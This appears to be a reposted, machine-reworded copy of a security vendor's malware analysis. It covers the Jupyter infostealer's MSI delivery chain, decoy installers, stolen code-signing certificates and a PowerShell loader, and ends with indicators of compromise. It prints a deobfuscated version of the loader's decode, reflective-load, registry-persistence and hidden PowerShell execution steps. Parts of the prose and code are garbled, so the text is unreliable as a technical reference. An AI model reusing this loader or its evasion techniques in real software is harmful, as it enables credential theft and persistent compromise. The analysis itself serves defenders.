New Jupyter Evasive delivery via MSI installer

0


[ad_1]

DevOps experience

introduction

In 2020, Morphisec introduced the Jupyter infostealer, a .NET attack that primarily targets Chromium, Firefox, and Chrome browser data while retaining the added capabilities of a backdoor.

Since then, Jupyter has remained active and very evasive. It continued to receive very weak to zero detections in the VirusTotal database, maintaining the ability to bypass detection solutions.

Then, on September 8, 2021, we identified a new delivery chain within Jupyter that is going under the radar of security solutions. Following this discovery, the Morphisec Labs team was made aware of several high-level targets threatened by the Jupyter infostealer. We are currently studying the scope of the campaign.

The following blog post describes the new distribution chain, showing how threat actors continue to scale up their attacks to become more effective and evasive.

Technical presentation

Jupyter attack stream 20-09-2021

Figure 1: The attack flow of the new Jupyter infostealer

MSI payload

In this section, we’ll take a brief look at some of the payload’s shared attributes so that we get an overview of what metrics to expect. This is based on the four variants that we have observed.

Payload size and name

Like previous Jupyter payloads, MSI payloads are consistently larger than 100MB in size. This allows the payload to thwart inline AV scanners.

The payload naming convention is:

  • Potential document topics
  • Words are separated by a dash ‘-‘
  • Each word begins with a capital letter

Examples can be found in the IOC section under the title “MSI Payload Names”.

MSI third-party installation wizard

The payloads were generated with a trial version of Advanced installer (version 18.6.1 build 2c9a75c6).

As described on their website, the Advanced Installation Wizard is an “all-in-one” application packaging tool. By using this tool, threat actors have access to easy implementation of obscured script executions.

The attribution can be found either in the properties of the file (OLE Compound) or in the properties table of the installer.

Figure 2: OLE Compound File Information

Figure 2: OLE Compound File Information

The properties table

Figure 3: Properties table

Decoy installation executable

As shown in Figure 1 above, all observed variants are described as Nitro Pro 13. Once the victim runs the MSI payload, they run a legitimate installation binary of Nitro Pro 13. The correlation of this attribution with the variant filenames suggests that the delivery method disguises it as PDF.

An image of the installation of Nitro Pro 13

Figure 4: Installing Nitro Pro 13

While all of the variants are described as Nitro, one of them actually contains SumatraPDF instead of.

An installer for Sumatra PDF

Figure 5: Installing Sumatra PDF

Digital signature

Two of the variants are signed with a (currently) valid certificate named ‘SP ZOO TACHOPARTS‘.

The Tachoparts certificate which has probably been stolen or spoofed

Figure 6: Tachoparts certificate

Based on the following certificate data, we can assume that the threat author has impersonated the certificate or stole it from a legitimate company in Poland.

image12

Figure 7: Tachoparts commercial information from Google

Another variant was signed with a revoked certificate named ‘OOO system‘.

The OOO Sistema certificate which has probably been stolen or spoofed

Figure 8: OOO Sistema certificate

As with the previous certificate, this one also correlates to a legitimate business. It was also likely an identity theft or theft in the company.

OOO Sistema certificate

Figure 9: Google OOO Sistema commercial information

Running PowerShell

The initial suspect flag visible in dynamic analysis is the PowerShell command line generated by msiexec.exe.

Command line

C: WindowsSysWOW64WindowsPowerShellv1.0powershell.exe -NoProfile -Not interactive
– Bypass of the execution policy

-File ‘C: UsersAppDataLocalTemppssEA35.ps1 ‘
-propFile ‘C: UsersAppDataLocalTempmsiEA13.txt ‘
-scriptFile ‘C: UsersAppDataLocalTempscrEA14.ps1 ‘
-scriptArgsFile ‘C: UsersAppDataLocalTempscrEA15.txt ‘
-propSep ‘:: ‘
-testPrefix ‘_testValue.’

Code block 1: CMD Shell command line

This command line is generated by a feature in the Advanced installer which is designed for run PowerShell loader as “CustomAction” attribute defined in MSI installers.

The file names in the settings differ between the variants but keep the same pattern. For example in ‘scrEA14.ps1‘, EA14 is represented by four hexadecimal characters. These four characters are different between payload variants.

image9

Figure 9: PowerShell loader integrated into CustomAction in AdvancedInstaller

Jupyter PowerShell Charger

The PowerShell file in the – Script file The parameter shown in code block 1 represents the Jupyter PowerShell loader.

This loader is very similar to previous Jupyter loaders in that it keeps a very elusive file with low detections to 0 on VirusTotal, which is rare for a full PowerShell loader (loader code with a built-in payload).

While Jupyter chargers are covered extensively in our blog and others, the new variant shares the same code pattern. The following code block is an example of an unobtrusive and embellished version of it:

$ b64_enc_payload = ‘deduced’;

$ random_path_str = jeiJBgXRTuVfsm;
$ payload_directory_path = $ ENV: APPDATAMicrosoft “ + $ random_path_str;
$ enc_payload_path = $ payload_directory_path + + $ random_path_str + ‘.’ +
$ random_path_str;
[System.IO.File]::WriteAllBytes($ enc_payload_path,
[System.Convert]::DeBase64String($ b64_enc_payload));

$ decode_and_execute_payload_script = ‘under the code embedded in the comment’
”’
$ xor_key = “inferred base64 key”;
$ b64_enc_payload = [System.IO.File]:: ReadAllBytes ($ enc_payload_path);
For ($ i = 0; $ i -lt $ b64_enc_payload.Count;) {
For ($ y = 0; $ y -lt $ xor_key.Length; $ y ++) {
$ b64_enc_payload[$i]= $ b64_enc_payload[$i] -bxor $ xor_key[$y];
$ i ++;
if ($ i -ge $ b64_enc_payload.Count) {
$ y = $ xor_key.Length
}
}
};
[System.Reflection.Assembly]:: Load ($ b64_enc_payload); // Load the ‘interact’ method


Create_Registry_Key -reg_path () -execution_command (‘Powershell -WindowStyle
Hidden -ep Bypass -Command ”+ $ decode_and_execute_payload_script ‘);
Create_Registry_Key -reg_path () -execution_command $ random_path_str.To lower();

$ lnk_object = New-Object -ComObject WScript.Shell.Create shortcut($ ENV: APPDATA +
);
$ lnk_object.Target Path = $ payload_directory_path + + $ random_path_str;
$ lnk_object.Window Style = 7;
$ lnk_object.to safeguard();

IEX $ decode_and_execute_payload_script;

Code block 2: Jupyter PowerShell charger unclogged

Note that like previous versions, this one also reflexively loads a DLL that initializes execution under the Deimos namespace in the Mars class (Mars.Deimos).

The payload of the .NET DLL

In our previous blog, we attributed the payloads to their internal version. The following table correlates the observed internal version and the earliest submission date of the MSI payload to the detections on VirusTotal.

Internal version of the Jupyter DLL

VirusTotal first submission

SP-9

September 08, 2021
1/57 Malicious detections

SP-10

September 08, 2021

2/57 Malicious detections

SP-11

September 10, 2021
0/57 Malicious detections

SP-13

September 13, 2021
0/57 Malicious detections

Although all .NET DLL payloads should be hidden, it appears that the SP-10 variant contains source code strings. The following figure shows the payload methods and class names.

image3

Conclusion

The evolution of the Jupyter infostealer / backdoor since we first identified it in 2020 proves the truth of the claim that threat actors are always innovating. The fact that this attack continues to have little or no detections on VirusTotal further indicates the ease with which threat actors evade detection-based solutions. It is clear that a new approach is needed for threat prevention, as it is likely that these evasive attacks will continue.

This is why Morphisec has designed its solutions to focus on deterministic prevention of evasive attacks rather than detection. Customers who operate the Morphisec breach prevention platform on their endpoints, on-premise servers, and in the cloud can rest assured that they are protected against evasive threats such as the Jupyter infostealer, regardless of detection rate. in VirusTotal.

Book a demo of Morphisec Guard

CIO

MSI payload hashes

bc7986f0c9f431b839a13a9a0dfa2711f86e9e9afbed9b9b456066602881ba71
1197067d50dd5dd5af12e715e2cc00c0ba1ff738173928bbcfbbad1ee0a52f21
8e06c31285911c936425921ccf9f20107160174acd602cc7f2dd8ca677e8956d
9e3b4e4948521467216515e92812e5a47fb23f5bcb3a8b1a6014ae2f038c7181

AdvancedInstall PowerShell Hash

88748aae11029228d84aef0855f4bc084dfd70450db1f7029746d8bc85182f93

Jupyter PowerShell Loader Hashes

e34af1b6edf33b155ca9854d084577c30e1bc9d96eee10014277a0e55a47beef

f6aa48bc45be3b603a48a5261a28cc75e9c1c2f65aa37bb807b6c1bd80dce05a

8bd8fa4a5500d390d69941cb5d89a568d46d49bc4ac731a6c548b7d8e69625c2

Jupyter payloads

1f034e91613ab7c290d172b87200a000365728f218cbd4491f59d09a20bfd866

8c35f2a78e366abf2450d5882c49c69ee5cc01dba3743938b45cedc2b5dee3a3

1c5082cb7fbd011feb14909320b163b038febed29700568f9a2c7b5a416fad51
2524cea17b8ec62d30a93751fc42cc4e33350caaff5ba9a2327c048b715b2d4a

IP C2

37,120,237[.]251

45.42.201[.]248

MSI payload names

Metlife-Disability-Waiver-Of-Premium-Benefit-Rider.msi
Medical-Engagement-Scale-Questionnaire.msi
Due-Diligence-Checklist-For-Oil-And-Gas-Properties.msi
Lease-non-renewal-letter-to-tenant-landlord.msi
Fedex-Tracking-By-Shipper-Receipt.msi
Christian-Doctrine-Clauses-List.msi
Omnicell-Cabinet-User-Manual.msi
app.msi

[ad_2]

Share.

About Author

Leave A Reply